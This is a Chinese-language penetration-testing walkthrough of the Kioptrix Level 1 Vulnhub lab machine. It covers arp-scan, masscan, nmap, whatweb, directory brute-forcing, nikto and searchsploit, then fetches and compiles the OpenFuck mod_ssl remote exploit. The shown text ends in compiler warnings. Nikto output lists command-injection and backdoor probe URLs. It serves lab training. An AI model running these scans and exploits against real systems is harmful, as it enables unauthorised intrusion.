vuInhub靶场实战系列--Kioptrix Level #1

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。

目录

  • 免责声明
  • 前言
  • 一、环境配置
    • 1.1 靶机信息
    • 1.2 靶场配置
  • 二、信息收集
    • 2.1 主机发现
    • 2.2 端口扫描
      • 2.2.1 masscan
      • 2.2.2 nmap
    • 2.3 指纹识别
    • 2.4 目录扫描
      • 2.4.1 dirb
      • 2.4.2 dirsearch
      • 2.4.3 gobuster
    • 2.5 漏洞发现
      • 2.5.1 nikto漏洞搜索
      • 2.5.2 searchsploit漏洞搜索
  • 三、渗透测试
    • 3.1 下载47080.c
    • 3.2 查看47080.c
    • 3.3 环境安装
    • 3.4 编译脚本
    • 3.5 执行脚本
    • 3.6 补充
      • 3.6.1 下载ptrace-kmod.c
      • 3.6.2 kali开启http服务
      • 3.6.3 靶机下载ptrace-kmod.c
      • 3.6.4 再次执行脚本
  • 渗透总结
  • 参考文章


前言

今日测试内容渗透Kioptrix Level #1靶机:

Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。
本文将进行Kioptrix Level #1靶机渗透测试,内容包括主机扫描、目录扫描、漏洞发现、linux内核提权等内容。


一、环境配置

1.1 靶机信息

官方链接https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
发布日期2010年2月17日
靶场大小186MB
作者Kioptrix
系列Kioptrix
难度★☆☆☆☆

1.2 靶场配置

渗透测试环境配置,请参考作者前面的内容,不再赘述:

  • vuInhub靶场实战系列-DC-2实战:https://editor.csdn.net/md/?articleId=139026849
  • 特别说明:在还没有开启靶机的时候,修改“Kioptix Level 1.vmx”配置文件中ethernet0.networkName = “Nat”
    nat模式

二、信息收集

2.1 主机发现

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1	00:50:56:c0:00:08	VMware, Inc.
192.168.6.2	00:50:56:f5:7b:9f	VMware, Inc.
192.168.6.164	00:0c:29:e1:92:af	VMware, Inc.
192.168.6.254	00:50:56:e4:d2:90	VMware, Inc.5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.403 seconds (106.53 hosts/sec). 4 responded

获得靶机信息:
IP地址:192.168.6.164
MAC地址:00:0c:29:e1:92:af

2.2 端口扫描

2.2.1 masscan

┌──(root㉿kali)-[/home/kali]
└─# masscan --rate=10000 --ports 0-65535 192.168.6.164
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2024-06-08 10:34:53 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 111/tcp on 192.168.6.164                                  
Discovered open port 22/tcp on 192.168.6.164                                   
Discovered open port 80/tcp on 192.168.6.164                                   
Discovered open port 1024/tcp on 192.168.6.164                            

开放端口:111、22、80、1024

2.2.2 nmap

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA Kioptix_Level#1 192.168.6.164 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-08 06:37 EDT
Nmap scan report for 192.168.6.164
Host is up (0.0041s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp  open  netbios-ssn Samba smbd (workgroup: dMYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2024-06-08T10:40:24+00:00; +1m53s from scanner time.
|_http-title: 400 Bad Request
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:E1:92:AF (VMware)Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: 1m52s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.68 seconds

综上所述,开放端口如下:

端口服务
22ssh服务(OpenSSH 2.9p2)
80http服务(Apache httpd 1.3.20 )
111rpcbind服务(RPC #100000)
134netbios-ssn Samba smbd (workgroup: dMYGROUP)
443ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024status 1 (RPC #100024)

2.3 指纹识别

┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.164
WhatWeb report for http://192.168.6.164
Status    : 200 OK
Title     : Test Page for the Apache Web Server on Red Hat Linux
IP        : 192.168.6.164
Country   : RESERVED, ZZSummary   : Apache[1.3.20][mod_ssl/2.8.4], Email[webmaster@example.com], HTTPServer[Red Hat Linux][Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b], OpenSSL[0.9.6b]Detected Plugins:
[ Apache ]The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version      : 1.3.20 (from HTTP Server Header)Module       : mod_ssl/2.8.4Google Dorks: (3)Website     : http://httpd.apache.org/[ Email ]Extract email addresses. Find valid email address and syntactically invalid email addresses from mailto: link tags. We match syntactically invalid links containing mailto: to catch anti-spam email addresses, eg. bob at gmail.com. This uses the simplified email regular expression from http://www.regular-expressions.info/email.html for valid email address matching. String       : webmaster@example.com[ HTTPServer ]HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS           : Red Hat LinuxString       : Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b (from server string)[ OpenSSL ]The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured, and Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library. Version      : 0.9.6bWebsite     : http://www.openssl.org/HTTP Headers:HTTP/1.1 200 OKDate: Sat, 08 Jun 2024 10:48:57 GMTServer: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6bLast-Modified: Thu, 06 Sep 2001 03:12:46 GMTETag: "8805-b4a-3b96e9ae"Accept-Ranges: bytesContent-Length: 2890Connection: closeContent-Type: text/html

结果展示

2.4 目录扫描

2.4.1 dirb

┌──(root㉿kali)-[/home/kali]
└─# dirb http://192.168.6.164-----------------
DIRB v2.22    
By The Dark Raver
-----------------START_TIME: Sat Jun  8 06:50:06 2024
URL_BASE: http://192.168.6.164/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612                                                          ---- Scanning URL: http://192.168.6.164/ ----
+ http://192.168.6.164/~operator (CODE:403|SIZE:273)                                                                                                                                                           
+ http://192.168.6.164/~root (CODE:403|SIZE:269)                                                                                                                                                               
+ http://192.168.6.164/cgi-bin/ (CODE:403|SIZE:272)                                                                                                                                                            
+ http://192.168.6.164/index.html (CODE:200|SIZE:2890)                                                                                                                                                         
==> DIRECTORY: http://192.168.6.164/manual/                                                                                                                                                                    
==> DIRECTORY: http://192.168.6.164/mrtg/                                                                                                                                                                      
==> DIRECTORY: http://192.168.6.164/usage/                                                                                                                                                                     ---- Entering directory: http://192.168.6.164/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.6.164/mrtg/ ----
+ http://192.168.6.164/mrtg/index.html (CODE:200|SIZE:17318)                                                                                                                                                   ---- Entering directory: http://192.168.6.164/usage/ ----
+ http://192.168.6.164/usage/index.html (CODE:200|SIZE:3704)                                                                                                                                                   -----------------
END_TIME: Sat Jun  8 06:50:47 2024
DOWNLOADED: 13836 - FOUND: 6

2.4.2 dirsearch

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.6.164 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481Output File: /home/kali/reports/_192.168.6.164/_24-06-08_06-51-46.txtTarget: http://192.168.6.164/[06:51:46] Starting: 
[06:51:50] 403 -  275B  - /.ht_wsr.txt                                      
[06:51:50] 403 -  278B  - /.htaccess.bak1                                   
[06:51:50] 403 -  278B  - /.htaccess.orig                                   
[06:51:50] 403 -  279B  - /.htaccess_extra
[06:51:50] 403 -  276B  - /.htaccessBAK                                     
[06:51:50] 403 -  280B  - /.htaccess.sample                                 
[06:51:50] 403 -  278B  - /.htaccess.save
[06:51:50] 403 -  268B  - /.htm
[06:51:50] 403 -  276B  - /.htaccess_sc                                     
[06:51:50] 403 -  277B  - /.htaccessOLD2
[06:51:50] 403 -  278B  - /.htaccess_orig
[06:51:50] 403 -  276B  - /.htaccessOLD
[06:51:50] 403 -  269B  - /.html
[06:51:50] 403 -  278B  - /.htpasswd_test                                   
[06:51:50] 403 -  275B  - /.httr-oauth
[06:51:50] 403 -  274B  - /.htpasswds                                       
[06:52:13] 403 -  272B  - /cgi-bin/                                         
[06:52:21] 403 -  268B  - /doc/                                             
[06:52:21] 403 -  283B  - /doc/html/index.html                              
[06:52:21] 403 -  283B  - /doc/en/changes.html                              
[06:52:23] 403 -  272B  - /doc/api/                                         
[06:52:23] 403 -  282B  - /doc/stable.version                               
[06:52:39] 301 -  294B  - /manual  ->  http://127.0.0.1/manual/             
[06:52:42] 200 -   17KB - /mrtg/                                            
[06:53:10] 200 -   27B  - /test.php                                         
[06:53:14] 301 -  293B  - /usage  ->  http://127.0.0.1/usage/               
[06:53:24] 403 -  273B  - /~operator                                        
[06:53:24] 403 -  269B  - /~root                                            Task Completed

2.4.3 gobuster

┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.6.164 -t 30
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.6.164
[+] Method:                  GET
[+] Threads:                 30
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,zip,html
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.6.164/index.html           (Status: 200) [Size: 2890]
http://192.168.6.164/.html                (Status: 403) [Size: 269]
http://192.168.6.164/test.php             (Status: 200) [Size: 27]
http://192.168.6.164/manual               (Status: 301) [Size: 294] [--> http://127.0.0.1/manual/]
http://192.168.6.164/usage                (Status: 301) [Size: 293] [--> http://127.0.0.1/usage/]
http://192.168.6.164/mrtg                 (Status: 301) [Size: 292] [--> http://127.0.0.1/mrtg/]
http://192.168.6.164/.html                (Status: 403) [Size: 269]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

综上所述,获得一些目录:
http://192.168.6.164/index.html
http://192.168.6.164/test.php
http://192.168.6.164/manual/
http://192.168.6.164/usage/
http://192.168.6.164/mrtg/

2.5 漏洞发现

2.5.1 nikto漏洞搜索

┌──(root㉿kali)-[/home/kali]
└─# nikto -h 192.168.6.164
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.6.164
+ Target Hostname:    192.168.6.164
+ Target Port:        80
+ Start Time:         2024-06-08 07:16:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ /: Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep  5 23:12:46 2001. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Apache is vulnerable to XSS via the Expect header. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.9.6) (may depend on server version).
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OpenSSL/0.9.6b appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution.
+ Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system.
+ Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0835
+ /manual/: Directory indexing found.
+ /manual/: Web server manual found.
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /test.php: This might be interesting.
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time:           2024-06-08 07:18:57 (GMT-4) (133 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

获得以下信息

CVEURL
CVE-2003-1418http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
CVE-2006-3918http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918
CVE-2001-0835http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0835

2.5.2 searchsploit漏洞搜索

┌──(root㉿kali)-[/home/kali]
└─# searchsploit mod_ssl 
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------Exploit Title                                                                                                                                                                |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Service                                                                                                                               | linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow                                                                                                                    | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                                                                                          | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)                                                                                                    | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)                                                                                                    | unix/remote/47080.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow                                                                                  | unix/remote/40347.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

这一个payload可以利用:
unix/remote/47080.c


三、渗透测试

3.1 下载47080.c

┌──(root㉿kali)-[/home/kali]
└─# searchsploit -m 47080.cExploit: Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)URL: https://www.exploit-db.com/exploits/47080Path: /usr/share/exploitdb/exploits/unix/remote/47080.cCodes: CVE-2002-0082, OSVDB-857Verified: False
File Type: C source, ASCII text
Copied to: /home/kali/47080.c

3.2 查看47080.c

┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# cat 47080.c            
/** OF version r00t VERY PRIV8 spabam* Version: v3.0.4* Requirements: libssl-dev    ( apt-get install libssl-dev )* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto* objdump -R /usr/sbin/httpd|grep free to get more targets* #hackarena irc.brasnet.org* Note: if required, host ptrace and replace wget target*/...

展示了使用说明

3.3 环境安装

┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# sudo apt-get install libssl-dev
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:cython3 debtags fonts-noto-color-emoji fonts-roboto-slab gir1.2-gtksource-3.0 gir1.2-javascriptcoregtk-4.0 gir1.2-soup-2.4 gir1.2-webkit2-4.0 kali-debtags libadwaita-1-0 libappstream5 libarmadillo10libatk-adaptor libatk1.0-data libavfilter7 libavformat58 libblockdev-crypto2 libblockdev-fs2 libblockdev-loop2 libblockdev-part-err2 libblockdev-part2 libblockdev-swap2 libblockdev-utils2 libblockdev2libcbor0.8 libcfitsio9 libcharls2 libclang-cpp14 libev4 libexporter-tiny-perl libflac8 libfmt8 libgdal30 libgeos3.10.2 libgssdp-1.2-0 libgupnp-1.2-1 libgupnp-igd-1.0-4 libhttp-server-simple-perlliblist-moreutils-perl liblist-moreutils-xs-perl libllvm12 libllvm14 liblttng-ust-ctl4 liblttng-ust0 libmms0 libncurses5 libnfs13 libnginx-mod-http-geoip libnginx-mod-http-image-filterlibnginx-mod-http-xslt-filter libnginx-mod-mail libnginx-mod-stream libnginx-mod-stream-geoip libnsl-dev libofa0 libperl5.32 libpoppler102 libpostproc55 libproj22 libprotobuf23 libpython3.10-minimallibpython3.10-stdlib libpython3.9-dev librtlsdr0 libsoup-gnome2.4-1 libspatialite7 libsrt1.4-gnutls libstemmer0d libsuperlu5 libswscale5 libtbb2 libtinfo5 libtirpc-dev libucl1 libwebsockets16 libxmlb2libyara8 llvm-14 llvm-14-dev llvm-14-linker-tools llvm-14-runtime llvm-14-tools lua-lpeg nginx-core openjdk-11-jre openjdk-11-jre-headless perl-modules-5.32 php8.1-mysql pwgenpython-mpltoolkits.basemap-data python-pastedeploy-tpl python3-advancedhttpserver python3-backcall python3-boltons python3-cairo-dev python3-commonmark python3-debian python3-geoip2 python3-geojsonpython3-graphene python3-graphene-sqlalchemy python3-graphql-core python3-graphql-relay python3-icalendar python3-ipaddr python3-jaraco.classes python3-jdcal python3-llvmlite python3-marshmallow-enumpython3-maxminddb python3-mistune python3-mpltoolkits.basemap python3-pickleshare python3-pip python3-promise python3-pyatspi python3-pypdf2 python3-pyproj python3-pyshp python3-requests-filepython3-requests-toolbelt python3-rule-engine python3-rx python3-singledispatch python3-smoke-zephyr python3-speaklater python3-unicodecsv python3-wheel python3.10 python3.10-minimal python3.9python3.9-dev python3.9-minimal ruby2.7 ruby2.7-dev zenity zenity-common
Use 'sudo apt autoremove' to remove them.
Suggested packages:libssl-doc
The following NEW packages will be installed:libssl-dev
0 upgraded, 1 newly installed, 0 to remove and 1100 not upgraded.
Need to get 2,699 kB of archives.
After this operation, 14.7 MB of additional disk space will be used.
Get:1 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 libssl-dev amd64 3.2.1-3 [2,699 kB]
Fetched 2,699 kB in 4s (637 kB/s)       
Selecting previously unselected package libssl-dev:amd64.
(Reading database ... 371282 files and directories currently installed.)
Preparing to unpack .../libssl-dev_3.2.1-3_amd64.deb ...
Unpacking libssl-dev:amd64 (3.2.1-3) ...
Setting up libssl-dev:amd64 (3.2.1-3) ...

依赖环境安装成功。

3.4 编译脚本

┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# gcc -o OpenFuck 47080.c -lcrypto
47080.c: In function ‘read_ssl_packet’:
47080.c:534:17: warning: ‘RC4’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]534 |                 RC4(ssl->rc4_read_key, rec_len, buf, buf);|                 ^~~
In file included from 47080.c:26:
/usr/include/openssl/rc4.h:37:28: note: declared here37 | OSSL_DEPRECATEDIN_3_0 void RC4(RC4_KEY *key, size_t len,|                            ^~~
47080.c: In function ‘send_ssl_packet’:
47080.c:583:17: warning: ‘MD5_Init’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]583 |                 MD5_Init(&ctx);|                 ^~~~~~~~
In file included from 47080.c:27:
/usr/include/openssl/md5.h:49:27: note: declared here49 | OSSL_DEPRECATEDIN_3_0 int MD5_Init(MD5_CTX *c);|                           ^~~~~~~~
47080.c:584:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]584 |                 MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);|                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);|                           ^~~~~~~~~~
47080.c:585:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]585 |                 MD5_Update(&ctx, rec, rec_len);|                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);|                           ^~~~~~~~~~
47080.c:586:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]586 |                 MD5_Update(&ctx, &seq, 4);|                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);|                           ^~~~~~~~~~
47080.c:587:17: warning: ‘MD5_Final’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]587 |                 MD5_Final(p, &ctx);|                 ^~~~~~~~~
/usr/include/openssl/md5.h:51:27: note: declared here51 | OSSL_DEPRECATEDIN_3_0 int MD5_Final(unsigned char *md, MD5_CTX *c);|                           ^~~~~~~~~
47080.c:594:17: warning: ‘RC4’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]594 |                 RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);|                 ^~~
/usr/include/openssl/rc4.h:37:28: note: declared here37 | OSSL_DEPRECATEDIN_3_0 void RC4(RC4_KEY *key, size_t len,|                            ^~~
47080.c: In function ‘send_client_master_key’:
47080.c:748:9: warning: ‘EVP_PKEY_get1_RSA’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]748 |         if (EVP_PKEY_get1_RSA(pkey) == NULL) {|         ^~
In file included from /usr/include/openssl/x509.h:29,from /usr/include/openssl/ssl.h:32,from 47080.c:21:
/usr/include/openssl/evp.h:1356:16: note: declared here1356 | struct rsa_st *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);|                ^~~~~~~~~~~~~~~~~
47080.c:754:9: warning: ‘RSA_public_encrypt’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]754 |         encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);|         ^~~~~~~~~~~~~~~~~~~~
In file included from /usr/include/openssl/x509.h:36:
/usr/include/openssl/rsa.h:293:5: note: declared here293 | int RSA_public_encrypt(int flen, const unsigned char *from, unsigned char *to,|     ^~~~~~~~~~~~~~~~~~
47080.c:754:9: warning: ‘EVP_PKEY_get1_RSA’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]754 |         encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);|         ^~~~~~~~~~~~~~~~~~~~
/usr/include/openssl/evp.h:1356:16: note: declared here1356 | struct rsa_st *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);|                ^~~~~~~~~~~~~~~~~
47080.c: In function ‘generate_key_material’:
47080.c:791:17: warning: ‘MD5_Init’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]791 |                 MD5_Init(&ctx);|                 ^~~~~~~~
/usr/include/openssl/md5.h:49:27: note: declared here49 | OSSL_DEPRECATEDIN_3_0 int MD5_Init(MD5_CTX *c);|                           ^~~~~~~~
47080.c:793:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]793 |                 MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);|                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);|                           ^~~~~~~~~~
47080.c:794:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]794 |                 MD5_Update(&ctx,&c,1);|                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);|                           ^~~~~~~~~~
47080.c:796:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]796 |                 MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);|                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);|                           ^~~~~~~~~~
47080.c:797:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]797 |                 MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);|                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);|                           ^~~~~~~~~~
47080.c:798:17: warning: ‘MD5_Final’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]798 |                 MD5_Final(km,&ctx);|                 ^~~~~~~~~
/usr/include/openssl/md5.h:51:27: note: declared here51 | OSSL_DEPRECATEDIN_3_0 int MD5_Final(unsigned char *md, MD5_CTX *c);|                           ^~~~~~~~~
47080.c: In function ‘generate_session_keys’:
47080.c:807:9: warning: ‘RC4_set_key’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]807 |         RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);|         ^~~~~~~~~~~
/usr/include/openssl/rc4.h:35:28: note: declared here35 | OSSL_DEPRECATEDIN_3_0 void RC4_set_key(RC4_KEY *key, int len,|                            ^~~~~~~~~~~
